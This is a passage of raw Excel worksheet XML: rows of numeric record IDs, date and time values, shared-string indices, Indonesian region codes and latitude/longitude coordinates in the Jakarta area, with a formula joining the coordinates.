    <row r="3381" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3381">
        <v>260741</v>
      </c>
      <c r="B3381" s="1">
        <v>44247</v>
      </c>
      <c r="C3381" s="2">
        <v>0.23541666666666669</v>
      </c>
      <c r="D3381" t="s">
        <v>2648</v>
      </c>
      <c r="E3381" t="s">
        <v>23</v>
      </c>
      <c r="G3381" t="s">
        <v>11262</v>
      </c>
      <c r="H3381" t="s">
        <v>26</v>
      </c>
      <c r="J3381" t="s">
        <v>439</v>
      </c>
      <c r="L3381" t="s">
        <v>11263</v>
      </c>
      <c r="M3381">
        <v>3174020006</v>
      </c>
      <c r="N3381">
        <v>3174020</v>
      </c>
      <c r="O3381">
        <v>3174</v>
      </c>
      <c r="P3381">
        <v>31</v>
      </c>
      <c r="Q3381" t="s">
        <v>427</v>
      </c>
      <c r="R3381" t="s">
        <v>31</v>
      </c>
      <c r="S3381" t="s">
        <v>32</v>
      </c>
      <c r="T3381" t="s">
        <v>33</v>
      </c>
      <c r="U3381" s="5">
        <v>10674947</v>
      </c>
      <c r="V3381" s="5" t="s">
        <v>17495</v>
      </c>
      <c r="W3381" s="5">
        <v>-617815</v>
      </c>
      <c r="X3381" t="s">
        <v>21233</v>
      </c>
      <c r="Y3381" t="str">
        <f t="shared" si="52"/>
        <v>-6.17815,106.74947</v>
      </c>
    </row>
    <row r="3382" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3382">
        <v>260770</v>
      </c>
      <c r="B3382" s="1">
        <v>44247</v>
      </c>
      <c r="C3382" s="2">
        <v>0.23805555555555555</v>
      </c>
      <c r="D3382" t="s">
        <v>22</v>
      </c>
      <c r="E3382" t="s">
        <v>23</v>
      </c>
      <c r="F3382" t="s">
        <v>11264</v>
      </c>
      <c r="G3382" t="s">
        <v>11265</v>
      </c>
      <c r="H3382" t="s">
        <v>26</v>
      </c>
      <c r="I3382" t="s">
        <v>11266</v>
      </c>
      <c r="J3382" t="s">
        <v>6155</v>
      </c>
      <c r="L3382" t="s">
        <v>11267</v>
      </c>
      <c r="M3382">
        <v>3174010001</v>
      </c>
      <c r="N3382">
        <v>3174010</v>
      </c>
      <c r="O3382">
        <v>3174</v>
      </c>
      <c r="P3382">
        <v>31</v>
      </c>
      <c r="Q3382" t="s">
        <v>239</v>
      </c>
      <c r="R3382" t="s">
        <v>69</v>
      </c>
      <c r="S3382" t="s">
        <v>32</v>
      </c>
      <c r="T3382" t="s">
        <v>33</v>
      </c>
      <c r="U3382" s="5">
        <v>10672274</v>
      </c>
      <c r="V3382" s="5" t="s">
        <v>17496</v>
      </c>
      <c r="W3382" s="5">
        <v>-622144</v>
      </c>
      <c r="X3382" t="s">
        <v>18717</v>
      </c>
      <c r="Y3382" t="str">
        <f t="shared" si="52"/>
        <v>-6.22144,106.72274</v>
      </c>
    </row>
    <row r="3383" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3383">
        <v>260771</v>
      </c>
      <c r="B3383" s="1">
        <v>44247</v>
      </c>
      <c r="C3383" s="2">
        <v>0.23909722222222221</v>
      </c>
      <c r="D3383" t="s">
        <v>22</v>
      </c>
      <c r="E3383" t="s">
        <v>23</v>
      </c>
      <c r="F3383" t="s">
        <v>11268</v>
      </c>
      <c r="G3383" t="s">
        <v>11269</v>
      </c>
      <c r="H3383" t="s">
        <v>26</v>
      </c>
      <c r="I3383" t="s">
        <v>65</v>
      </c>
      <c r="J3383" t="s">
        <v>2627</v>
      </c>
      <c r="L3383" t="s">
        <v>11270</v>
      </c>
      <c r="M3383">
        <v>3275031004</v>
      </c>
      <c r="N3383">
        <v>3275031</v>
      </c>
      <c r="O3383">
        <v>3275</v>
      </c>
      <c r="P3383">
        <v>32</v>
      </c>
      <c r="Q3383" t="s">
        <v>4469</v>
      </c>
      <c r="R3383" t="s">
        <v>574</v>
      </c>
      <c r="S3383" t="s">
        <v>41</v>
      </c>
      <c r="T3383" t="s">
        <v>42</v>
      </c>
      <c r="U3383" s="5">
        <v>10701829</v>
      </c>
      <c r="V3383" s="5" t="s">
        <v>17497</v>
      </c>
      <c r="W3383" s="5">
        <v>-628568</v>
      </c>
      <c r="X3383" t="s">
        <v>21234</v>
      </c>
      <c r="Y3383" t="str">
        <f t="shared" si="52"/>
        <v>-6.28568,107.01829</v>
      </c>
    </row>
    <row r="3384" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3384">
        <v>260890</v>
      </c>
      <c r="B3384" s="1">
        <v>44247</v>
      </c>
      <c r="C3384" s="2">
        <v>0.24931712962962962</v>
      </c>
      <c r="D3384" t="s">
        <v>22</v>
      </c>
      <c r="E3384" t="s">
        <v>23</v>
      </c>
      <c r="F3384" t="s">
        <v>11271</v>
      </c>
      <c r="G3384" t="s">
        <v>11272</v>
      </c>
      <c r="H3384" t="s">
        <v>26</v>
      </c>
      <c r="I3384" t="s">
        <v>11273</v>
      </c>
      <c r="J3384" t="s">
        <v>11274</v>
      </c>
      <c r="M3384">
        <v>3172030006</v>
      </c>
      <c r="N3384">
        <v>3172030</v>
      </c>
      <c r="O3384">
        <v>3172</v>
      </c>
      <c r="P3384">
        <v>31</v>
      </c>
      <c r="Q3384" t="s">
        <v>462</v>
      </c>
      <c r="R3384" t="s">
        <v>228</v>
      </c>
      <c r="S3384" t="s">
        <v>49</v>
      </c>
      <c r="T3384" t="s">
        <v>33</v>
      </c>
      <c r="U3384" s="5">
        <v>10690628</v>
      </c>
      <c r="V3384" s="5" t="s">
        <v>17498</v>
      </c>
      <c r="W3384" s="5">
        <v>-630317</v>
      </c>
      <c r="X3384" t="s">
        <v>21235</v>
      </c>
      <c r="Y3384" t="str">
        <f t="shared" si="52"/>
        <v>-6.30317,106.90628</v>
      </c>
    </row>
    <row r="3385" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3385">
        <v>260891</v>
      </c>
      <c r="B3385" s="1">
        <v>44247</v>
      </c>
      <c r="C3385" s="2">
        <v>0.25082175925925926</v>
      </c>
      <c r="D3385" t="s">
        <v>22</v>
      </c>
      <c r="E3385" t="s">
        <v>23</v>
      </c>
      <c r="F3385" s="3" t="s">
        <v>11275</v>
      </c>
      <c r="G3385" t="s">
        <v>11276</v>
      </c>
      <c r="H3385" t="s">
        <v>26</v>
      </c>
      <c r="I3385" t="s">
        <v>2188</v>
      </c>
      <c r="J3385" t="s">
        <v>3135</v>
      </c>
      <c r="L3385" t="s">
        <v>11277</v>
      </c>
      <c r="M3385">
        <v>3671010001</v>
      </c>
      <c r="N3385">
        <v>3671010</v>
      </c>
      <c r="O3385">
        <v>3671</v>
      </c>
      <c r="P3385">
        <v>36</v>
      </c>
      <c r="Q3385" t="s">
        <v>4656</v>
      </c>
      <c r="R3385" t="s">
        <v>200</v>
      </c>
      <c r="S3385" t="s">
        <v>201</v>
      </c>
      <c r="T3385" t="s">
        <v>171</v>
      </c>
      <c r="U3385" s="5">
        <v>10669626</v>
      </c>
      <c r="V3385" s="5" t="s">
        <v>17499</v>
      </c>
      <c r="W3385" s="5">
        <v>-623293</v>
      </c>
      <c r="X3385" t="s">
        <v>21236</v>
      </c>
      <c r="Y3385" t="str">
        <f t="shared" si="52"/>
        <v>-6.23293,106.69626</v>
      </c>
    </row>
    <row r="3386" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3386">
        <v>260962</v>
      </c>
      <c r="B3386" s="1">
        <v>44247</v>
      </c>
      <c r="C3386" s="2">
        <v>0.25508101851851855</v>
      </c>
      <c r="D3386" t="s">
        <v>22</v>
      </c>
      <c r="E3386" t="s">
        <v>23</v>
      </c>
      <c r="F3386" t="s">
        <v>11278</v>
      </c>
      <c r="G3386" t="s">
        <v>11279</v>
      </c>
      <c r="H3386" t="s">
        <v>26</v>
      </c>
      <c r="I3386" t="s">
        <v>11280</v>
      </c>
      <c r="J3386" t="s">
        <v>4282</v>
      </c>
      <c r="L3386" t="s">
        <v>11281</v>
      </c>
      <c r="M3386">
        <v>3171070005</v>
      </c>
      <c r="N3386">
        <v>3171070</v>
      </c>
      <c r="O3386">
        <v>3171</v>
      </c>
      <c r="P3386">
        <v>31</v>
      </c>
      <c r="Q3386" t="s">
        <v>218</v>
      </c>
      <c r="R3386" t="s">
        <v>121</v>
      </c>
      <c r="S3386" t="s">
        <v>108</v>
      </c>
      <c r="T3386" t="s">
        <v>33</v>
      </c>
      <c r="U3386" s="5">
        <v>10681884</v>
      </c>
      <c r="V3386" s="5" t="s">
        <v>17500</v>
      </c>
      <c r="W3386" s="5">
        <v>-623424</v>
      </c>
      <c r="X3386" t="s">
        <v>21237</v>
      </c>
      <c r="Y3386" t="str">
        <f t="shared" si="52"/>
        <v>-6.23424,106.81884</v>
      </c>
    </row>
    <row r="3387" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3387">
        <v>260963</v>
      </c>
      <c r="B3387" s="1">
        <v>44247</v>
      </c>
      <c r="C3387" s="2">
        <v>0.25574074074074077</v>
      </c>
      <c r="D3387" t="s">
        <v>22</v>
      </c>
      <c r="E3387" t="s">
        <v>23</v>
      </c>
      <c r="F3387" t="s">
        <v>11282</v>
      </c>
      <c r="G3387" t="s">
        <v>11283</v>
      </c>
      <c r="H3387" t="s">
        <v>26</v>
      </c>
      <c r="I3387" t="s">
        <v>2196</v>
      </c>
      <c r="J3387" t="s">
        <v>11284</v>
      </c>
      <c r="L3387" t="s">
        <v>11285</v>
      </c>
      <c r="M3387">
        <v>3174020007</v>
      </c>
      <c r="N3387">
        <v>3174020</v>
      </c>
      <c r="O3387">
        <v>3174</v>
      </c>
      <c r="P3387">
        <v>31</v>
      </c>
      <c r="Q3387" t="s">
        <v>95</v>
      </c>
      <c r="R3387" t="s">
        <v>31</v>
      </c>
      <c r="S3387" t="s">
        <v>32</v>
      </c>
      <c r="T3387" t="s">
        <v>33</v>
      </c>
      <c r="U3387" s="5">
        <v>10676531</v>
      </c>
      <c r="V3387" s="5" t="s">
        <v>17501</v>
      </c>
      <c r="W3387" s="5">
        <v>-617108</v>
      </c>
      <c r="X3387" t="s">
        <v>21238</v>
      </c>
      <c r="Y3387" t="str">
        <f t="shared" si="52"/>
        <v>-6.17108,106.76531</v>
      </c>
    </row>
    <row r="3388" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3388">
        <v>260999</v>
      </c>
      <c r="B3388" s="1">
        <v>44247</v>
      </c>
      <c r="C3388" s="2">
        <v>0.25870370370370371</v>
      </c>
      <c r="D3388" t="s">
        <v>22</v>
      </c>
      <c r="E3388" t="s">
        <v>23</v>
      </c>
      <c r="F3388" t="s">
        <v>11286</v>
      </c>
      <c r="H3388" t="s">
        <v>26</v>
      </c>
      <c r="I3388" t="s">
        <v>111</v>
      </c>
      <c r="J3388" t="s">
        <v>2820</v>
      </c>
      <c r="L3388" t="s">
        <v>11287</v>
      </c>
      <c r="M3388">
        <v>3171020006</v>
      </c>
      <c r="N3388">
        <v>3171020</v>
      </c>
      <c r="O3388">
        <v>3171</v>
      </c>
      <c r="P3388">
        <v>31</v>
      </c>
      <c r="Q3388" t="s">
        <v>499</v>
      </c>
      <c r="R3388" t="s">
        <v>484</v>
      </c>
      <c r="S3388" t="s">
        <v>108</v>
      </c>
      <c r="T3388" t="s">
        <v>33</v>
      </c>
      <c r="U3388" s="5">
        <v>10682834</v>
      </c>
      <c r="V3388" s="5" t="s">
        <v>17502</v>
      </c>
      <c r="W3388" s="5">
        <v>-627871</v>
      </c>
      <c r="X3388" t="s">
        <v>21239</v>
      </c>
      <c r="Y3388" t="str">
        <f t="shared" si="52"/>
        <v>-6.27871,106.82834</v>
      </c>
    </row>
    <row r="3389" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3389">
        <v>261000</v>
      </c>
      <c r="B3389" s="1">
        <v>44247</v>
      </c>
      <c r="C3389" s="2">
        <v>0.25961805555555556</v>
      </c>
      <c r="D3389" t="s">
        <v>22</v>
      </c>
      <c r="E3389" t="s">
        <v>23</v>
      </c>
      <c r="F3389" t="s">
        <v>11288</v>
      </c>
      <c r="G3389" t="s">
        <v>11289</v>
      </c>
      <c r="H3389" t="s">
        <v>26</v>
      </c>
      <c r="I3389" t="s">
        <v>3632</v>
      </c>
      <c r="J3389" t="s">
        <v>5800</v>
      </c>
      <c r="L3389" t="s">
        <v>11290</v>
      </c>
      <c r="M3389">
        <v>3173010002</v>
      </c>
      <c r="N3389">
        <v>3173010</v>
      </c>
      <c r="O3389">
        <v>3173</v>
      </c>
      <c r="P3389">
        <v>31</v>
      </c>
      <c r="Q3389" t="s">
        <v>4908</v>
      </c>
      <c r="R3389" t="s">
        <v>1481</v>
      </c>
      <c r="S3389" t="s">
        <v>62</v>
      </c>
      <c r="T3389" t="s">
        <v>33</v>
      </c>
      <c r="U3389" s="5">
        <v>10681239</v>
      </c>
      <c r="V3389" s="5" t="s">
        <v>17503</v>
      </c>
      <c r="W3389" s="5">
        <v>-621246</v>
      </c>
      <c r="X3389" t="s">
        <v>21240</v>
      </c>
      <c r="Y3389" t="str">
        <f t="shared" si="52"/>
        <v>-6.21246,106.81239</v>
      </c>
    </row>
    <row r="3390" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3390">
        <v>261001</v>
      </c>
      <c r="B3390" s="1">
        <v>44247</v>
      </c>
      <c r="C3390" s="2">
        <v>0.26119212962962962</v>
      </c>
      <c r="D3390" t="s">
        <v>22</v>
      </c>
      <c r="E3390" t="s">
        <v>23</v>
      </c>
      <c r="F3390" t="s">
        <v>11291</v>
      </c>
      <c r="G3390" t="s">
        <v>11292</v>
      </c>
      <c r="H3390" t="s">
        <v>26</v>
      </c>
      <c r="I3390" t="s">
        <v>1055</v>
      </c>
      <c r="J3390" t="s">
        <v>6155</v>
      </c>
      <c r="L3390" t="s">
        <v>11293</v>
      </c>
      <c r="M3390">
        <v>3174010001</v>
      </c>
      <c r="N3390">
        <v>3174010</v>
      </c>
      <c r="O3390">
        <v>3174</v>
      </c>
      <c r="P3390">
        <v>31</v>
      </c>
      <c r="Q3390" t="s">
        <v>239</v>
      </c>
      <c r="R3390" t="s">
        <v>69</v>
      </c>
      <c r="S3390" t="s">
        <v>32</v>
      </c>
      <c r="T3390" t="s">
        <v>33</v>
      </c>
      <c r="U3390" s="5">
        <v>10671876</v>
      </c>
      <c r="V3390" s="5" t="s">
        <v>17504</v>
      </c>
      <c r="W3390" s="5">
        <v>-622308</v>
      </c>
      <c r="X3390" t="s">
        <v>21241</v>
      </c>
      <c r="Y3390" t="str">
        <f t="shared" si="52"/>
        <v>-6.22308,106.71876</v>
      </c>
    </row>
    <row r="3391" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3391">
        <v>261037</v>
      </c>
      <c r="B3391" s="1">
        <v>44247</v>
      </c>
      <c r="C3391" s="2">
        <v>0.26484953703703701</v>
      </c>
      <c r="D3391" t="s">
        <v>22</v>
      </c>
      <c r="E3391" t="s">
        <v>23</v>
      </c>
      <c r="F3391" t="s">
        <v>11294</v>
      </c>
      <c r="H3391" t="s">
        <v>26</v>
      </c>
      <c r="I3391" t="s">
        <v>7368</v>
      </c>
      <c r="J3391" t="s">
        <v>2627</v>
      </c>
      <c r="L3391" t="s">
        <v>11295</v>
      </c>
      <c r="M3391">
        <v>3216061003</v>
      </c>
      <c r="N3391">
        <v>3216061</v>
      </c>
      <c r="O3391">
        <v>3216</v>
      </c>
      <c r="P3391">
        <v>32</v>
      </c>
      <c r="Q3391" t="s">
        <v>10803</v>
      </c>
      <c r="R3391" t="s">
        <v>55</v>
      </c>
      <c r="S3391" t="s">
        <v>41</v>
      </c>
      <c r="T3391" t="s">
        <v>42</v>
      </c>
      <c r="U3391" s="5">
        <v>10715243</v>
      </c>
      <c r="V3391" s="5" t="s">
        <v>17505</v>
      </c>
      <c r="W3391" s="5">
        <v>-628894</v>
      </c>
      <c r="X3391" t="s">
        <v>21242</v>
      </c>
      <c r="Y3391" t="str">
        <f t="shared" si="52"/>
        <v>-6.28894,107.15243</v>
      </c>
    </row>
    <row r="3392" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3392">
        <v>261073</v>
      </c>
      <c r="B3392" s="1">
        <v>44247</v>
      </c>
      <c r="C3392" s="2">
        <v>0.2679050925925926</v>
      </c>
      <c r="D3392" t="s">
        <v>22</v>
      </c>
      <c r="E3392" t="s">
        <v>23</v>
      </c>
      <c r="F3392" t="s">
        <v>11296</v>
      </c>
      <c r="G3392" t="s">
        <v>11297</v>
      </c>
      <c r="H3392" t="s">
        <v>26</v>
      </c>
      <c r="I3392" t="s">
        <v>27</v>
      </c>
      <c r="J3392" t="s">
        <v>723</v>
      </c>
      <c r="L3392" t="s">
        <v>11298</v>
      </c>
      <c r="M3392">
        <v>3174070002</v>
      </c>
      <c r="N3392">
        <v>3174070</v>
      </c>
      <c r="O3392">
        <v>3174</v>
      </c>
      <c r="P3392">
        <v>31</v>
      </c>
      <c r="Q3392" t="s">
        <v>621</v>
      </c>
      <c r="R3392" t="s">
        <v>84</v>
      </c>
      <c r="S3392" t="s">
        <v>32</v>
      </c>
      <c r="T3392" t="s">
        <v>33</v>
      </c>
      <c r="U3392" s="5">
        <v>10674575</v>
      </c>
      <c r="V3392" s="5" t="s">
        <v>17506</v>
      </c>
      <c r="W3392" s="5">
        <v>-616513</v>
      </c>
      <c r="X3392" t="s">
        <v>21243</v>
      </c>
      <c r="Y3392" t="str">
        <f t="shared" si="52"/>
        <v>-6.16513,106.74575</v>
      </c>
    </row>
    <row r="3393" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3393">
        <v>261109</v>
      </c>
      <c r="B3393" s="1">
        <v>44247</v>
      </c>
      <c r="C3393" s="2">
        <v>0.27097222222222223</v>
      </c>
      <c r="D3393" t="s">
        <v>22</v>
      </c>
      <c r="E3393" t="s">
        <v>23</v>
      </c>
      <c r="F3393" t="s">
        <v>11299</v>
      </c>
      <c r="G3393" t="s">
        <v>11300</v>
      </c>
      <c r="H3393" t="s">
        <v>26</v>
      </c>
      <c r="I3393" t="s">
        <v>271</v>
      </c>
      <c r="J3393" t="s">
        <v>2627</v>
      </c>
      <c r="L3393" t="s">
        <v>11301</v>
      </c>
      <c r="M3393">
        <v>3275031001</v>
      </c>
      <c r="N3393">
        <v>3275031</v>
      </c>
      <c r="O3393">
        <v>3275</v>
      </c>
      <c r="P3393">
        <v>32</v>
      </c>
      <c r="Q3393" t="s">
        <v>10622</v>
      </c>
      <c r="R3393" t="s">
        <v>574</v>
      </c>
      <c r="S3393" t="s">
        <v>41</v>
      </c>
      <c r="T3393" t="s">
        <v>42</v>
      </c>
      <c r="U3393" s="5">
        <v>10701694</v>
      </c>
      <c r="V3393" s="5" t="s">
        <v>17507</v>
      </c>
      <c r="W3393" s="5">
        <v>-632125</v>
      </c>
      <c r="X3393" t="s">
        <v>21244</v>
      </c>
      <c r="Y3393" t="str">
        <f t="shared" si="52"/>
        <v>-6.32125,107.01694</v>
      </c>
    </row>
    <row r="3394" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3394">
        <v>261145</v>
      </c>
      <c r="B3394" s="1">
        <v>44247</v>
      </c>
      <c r="C3394" s="2">
        <v>0.2729050925925926</v>
      </c>
      <c r="D3394" t="s">
        <v>22</v>
      </c>
      <c r="E3394" t="s">
        <v>23</v>
      </c>
      <c r="F3394" t="s">
        <v>11302</v>
      </c>
      <c r="G3394" t="s">
        <v>11303</v>
      </c>
      <c r="H3394" t="s">
        <v>26</v>
      </c>
      <c r="I3394" t="s">
        <v>1340</v>
      </c>
      <c r="J3394" t="s">
        <v>1471</v>
      </c>
      <c r="L3394" t="s">
        <v>11304</v>
      </c>
      <c r="M3394">
        <v>3171100001</v>
      </c>
      <c r="N3394">
        <v>3171100</v>
      </c>
      <c r="O3394">
        <v>3171</v>
      </c>
      <c r="P3394">
        <v>31</v>
      </c>
      <c r="Q3394" t="s">
        <v>1474</v>
      </c>
      <c r="R3394" t="s">
        <v>107</v>
      </c>
      <c r="S3394" t="s">
        <v>108</v>
      </c>
      <c r="T3394" t="s">
        <v>33</v>
      </c>
      <c r="U3394" s="5">
        <v>10681579</v>
      </c>
      <c r="V3394" s="5" t="s">
        <v>17508</v>
      </c>
      <c r="W3394" s="5">
        <v>-621705</v>
      </c>
      <c r="X3394" t="s">
        <v>21245</v>
      </c>
      <c r="Y3394" t="str">
        <f t="shared" si="52"/>
        <v>-6.21705,106.81579</v>
      </c>
    </row>
    <row r="3395" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3395">
        <v>261181</v>
      </c>
      <c r="B3395" s="1">
        <v>44247</v>
      </c>
      <c r="C3395" s="2">
        <v>0.27605324074074072</v>
      </c>
      <c r="D3395" t="s">
        <v>22</v>
      </c>
      <c r="E3395" t="s">
        <v>23</v>
      </c>
      <c r="F3395" t="s">
        <v>11305</v>
      </c>
      <c r="G3395" t="s">
        <v>11306</v>
      </c>
      <c r="H3395" t="s">
        <v>26</v>
      </c>
      <c r="I3395" t="s">
        <v>555</v>
      </c>
      <c r="J3395" t="s">
        <v>5800</v>
      </c>
      <c r="L3395" t="s">
        <v>11307</v>
      </c>
      <c r="M3395">
        <v>3173010002</v>
      </c>
      <c r="N3395">
        <v>3173010</v>
      </c>
      <c r="O3395">
        <v>3173</v>
      </c>
      <c r="P3395">
        <v>31</v>
      </c>
      <c r="Q3395" t="s">
        <v>4908</v>
      </c>
      <c r="R3395" t="s">
        <v>1481</v>
      </c>
      <c r="S3395" t="s">
        <v>62</v>
      </c>
      <c r="T3395" t="s">
        <v>33</v>
      </c>
      <c r="U3395" s="5">
        <v>10681313</v>
      </c>
      <c r="V3395" s="5" t="s">
        <v>17509</v>
      </c>
      <c r="W3395" s="5">
        <v>-621356</v>
      </c>
      <c r="X3395" t="s">
        <v>21246</v>
      </c>
      <c r="Y3395" t="str">
        <f t="shared" ref="Y3395:Y3458" si="53">CONCATENATE(X3395,",",V3395)</f>
        <v>-6.21356,106.81313</v>
      </c>
    </row>
    <row r="3396" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3396">
        <v>261182</v>
      </c>
      <c r="B3396" s="1">
        <v>44247</v>
      </c>
      <c r="C3396" s="2">
        <v>0.27663194444444444</v>
      </c>
      <c r="D3396" t="s">
        <v>22</v>
      </c>
      <c r="E3396" t="s">
        <v>23</v>
      </c>
      <c r="F3396" t="s">
        <v>11308</v>
      </c>
      <c r="G3396" t="s">
        <v>11309</v>
      </c>
      <c r="H3396" t="s">
        <v>26</v>
      </c>
      <c r="I3396" t="s">
        <v>11310</v>
      </c>
      <c r="J3396" t="s">
        <v>2627</v>
      </c>
      <c r="L3396" t="s">
        <v>11311</v>
      </c>
      <c r="M3396">
        <v>3216071001</v>
      </c>
      <c r="N3396">
        <v>3216071</v>
      </c>
      <c r="O3396">
        <v>3216</v>
      </c>
      <c r="P3396">
        <v>32</v>
      </c>
      <c r="Q3396" t="s">
        <v>11312</v>
      </c>
      <c r="R3396" t="s">
        <v>2013</v>
      </c>
      <c r="S3396" t="s">
        <v>41</v>
      </c>
      <c r="T3396" t="s">
        <v>42</v>
      </c>
      <c r="U3396" s="5">
        <v>10704397</v>
      </c>
      <c r="V3396" s="5" t="s">
        <v>17510</v>
      </c>
      <c r="W3396" s="5">
        <v>-634085</v>
      </c>
      <c r="X3396" t="s">
        <v>21247</v>
      </c>
      <c r="Y3396" t="str">
        <f t="shared" si="53"/>
        <v>-6.34085,107.04397</v>
      </c>
    </row>
    <row r="3397" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3397">
        <v>261183</v>
      </c>
      <c r="B3397" s="1">
        <v>44247</v>
      </c>
      <c r="C3397" s="2">
        <v>0.27767361111111111</v>
      </c>
      <c r="D3397" t="s">
        <v>22</v>
      </c>
      <c r="E3397" t="s">
        <v>23</v>
      </c>
      <c r="F3397" t="s">
        <v>11313</v>
      </c>
      <c r="H3397" t="s">
        <v>26</v>
      </c>
      <c r="I3397" t="s">
        <v>1447</v>
      </c>
      <c r="J3397" t="s">
        <v>4013</v>
      </c>
      <c r="L3397" t="s">
        <v>11314</v>
      </c>
      <c r="M3397">
        <v>3172060008</v>
      </c>
      <c r="N3397">
        <v>3172060</v>
      </c>
      <c r="O3397">
        <v>3172</v>
      </c>
      <c r="P3397">
        <v>31</v>
      </c>
      <c r="Q3397" t="s">
        <v>1096</v>
      </c>
      <c r="R3397" t="s">
        <v>48</v>
      </c>
      <c r="S3397" t="s">
        <v>49</v>
      </c>
      <c r="T3397" t="s">
        <v>33</v>
      </c>
      <c r="U3397" s="5">
        <v>10685955</v>
      </c>
      <c r="V3397" s="5" t="s">
        <v>17511</v>
      </c>
      <c r="W3397" s="5">
        <v>-621432</v>
      </c>
      <c r="X3397" t="s">
        <v>21248</v>
      </c>
      <c r="Y3397" t="str">
        <f t="shared" si="53"/>
        <v>-6.21432,106.85955</v>
      </c>
    </row>
    <row r="3398" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3398">
        <v>261289</v>
      </c>
      <c r="B3398" s="1">
        <v>44247</v>
      </c>
      <c r="C3398" s="2">
        <v>0.28820601851851851</v>
      </c>
      <c r="D3398" t="s">
        <v>22</v>
      </c>
      <c r="E3398" t="s">
        <v>23</v>
      </c>
      <c r="F3398" t="s">
        <v>11315</v>
      </c>
      <c r="H3398" t="s">
        <v>26</v>
      </c>
      <c r="I3398" t="s">
        <v>193</v>
      </c>
      <c r="J3398" t="s">
        <v>2627</v>
      </c>
      <c r="L3398" t="s">
        <v>11316</v>
      </c>
      <c r="M3398">
        <v>3275020005</v>
      </c>
      <c r="N3398">
        <v>3275020</v>
      </c>
      <c r="O3398">
        <v>3275</v>
      </c>
      <c r="P3398">
        <v>32</v>
      </c>
      <c r="Q3398" t="s">
        <v>827</v>
      </c>
      <c r="R3398" t="s">
        <v>828</v>
      </c>
      <c r="S3398" t="s">
        <v>41</v>
      </c>
      <c r="T3398" t="s">
        <v>42</v>
      </c>
      <c r="U3398" s="5">
        <v>10695157</v>
      </c>
      <c r="V3398" s="5" t="s">
        <v>17512</v>
      </c>
      <c r="W3398" s="5">
        <v>-628711</v>
      </c>
      <c r="X3398" t="s">
        <v>21249</v>
      </c>
      <c r="Y3398" t="str">
        <f t="shared" si="53"/>
        <v>-6.28711,106.95157</v>
      </c>
    </row>
    <row r="3399" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3399">
        <v>261325</v>
      </c>
      <c r="B3399" s="1">
        <v>44247</v>
      </c>
      <c r="C3399" s="2">
        <v>0.29072916666666665</v>
      </c>
      <c r="D3399" t="s">
        <v>22</v>
      </c>
      <c r="E3399" t="s">
        <v>23</v>
      </c>
      <c r="F3399" t="s">
        <v>11317</v>
      </c>
      <c r="G3399" t="s">
        <v>11318</v>
      </c>
      <c r="H3399" t="s">
        <v>26</v>
      </c>
      <c r="I3399" t="s">
        <v>8572</v>
      </c>
      <c r="J3399" t="s">
        <v>3675</v>
      </c>
      <c r="M3399">
        <v>3171070001</v>
      </c>
      <c r="N3399">
        <v>3171070</v>
      </c>
      <c r="O3399">
        <v>3171</v>
      </c>
      <c r="P3399">
        <v>31</v>
      </c>
      <c r="Q3399" t="s">
        <v>120</v>
      </c>
      <c r="R3399" t="s">
        <v>121</v>
      </c>
      <c r="S3399" t="s">
        <v>108</v>
      </c>
      <c r="T3399" t="s">
        <v>33</v>
      </c>
      <c r="U3399" s="5">
        <v>10682506</v>
      </c>
      <c r="V3399" s="5" t="s">
        <v>17291</v>
      </c>
      <c r="W3399" s="5">
        <v>-625834</v>
      </c>
      <c r="X3399" t="s">
        <v>19447</v>
      </c>
      <c r="Y3399" t="str">
        <f t="shared" si="53"/>
        <v>-6.25834,106.82506</v>
      </c>
    </row>
    <row r="3400" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3400">
        <v>261396</v>
      </c>
      <c r="B3400" s="1">
        <v>44247</v>
      </c>
      <c r="C3400" s="2">
        <v>0.29741898148148149</v>
      </c>
      <c r="D3400" t="s">
        <v>22</v>
      </c>
      <c r="E3400" t="s">
        <v>23</v>
      </c>
      <c r="F3400" t="s">
        <v>11319</v>
      </c>
      <c r="G3400" t="s">
        <v>11320</v>
      </c>
      <c r="H3400" t="s">
        <v>26</v>
      </c>
      <c r="I3400" t="s">
        <v>11321</v>
      </c>
      <c r="J3400" t="s">
        <v>875</v>
      </c>
      <c r="L3400" t="s">
        <v>11322</v>
      </c>
      <c r="M3400">
        <v>3174070002</v>
      </c>
      <c r="N3400">
        <v>3174070</v>
      </c>
      <c r="O3400">
        <v>3174</v>
      </c>
      <c r="P3400">
        <v>31</v>
      </c>
      <c r="Q3400" t="s">
        <v>621</v>
      </c>
      <c r="R3400" t="s">
        <v>84</v>
      </c>
      <c r="S3400" t="s">
        <v>32</v>
      </c>
      <c r="T3400" t="s">
        <v>33</v>
      </c>
      <c r="U3400" s="5">
        <v>10673402</v>
      </c>
      <c r="V3400" s="5" t="s">
        <v>17513</v>
      </c>
      <c r="W3400" s="5">
        <v>-616994</v>
      </c>
      <c r="X3400" t="s">
        <v>18283</v>
      </c>
      <c r="Y3400" t="str">
        <f t="shared" si="53"/>
        <v>-6.16994,106.73402</v>
      </c>
    </row>
    <row r="3401" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3401">
        <v>261398</v>
      </c>
      <c r="B3401" s="1">
        <v>44247</v>
      </c>
      <c r="C3401" s="2">
        <v>0.2986111111111111</v>
      </c>
      <c r="D3401" t="s">
        <v>2648</v>
      </c>
      <c r="E3401" t="s">
        <v>23</v>
      </c>
      <c r="G3401" t="s">
        <v>11323</v>
      </c>
      <c r="H3401" t="s">
        <v>26</v>
      </c>
      <c r="I3401" t="s">
        <v>103</v>
      </c>
      <c r="J3401" t="s">
        <v>6980</v>
      </c>
      <c r="L3401" t="s">
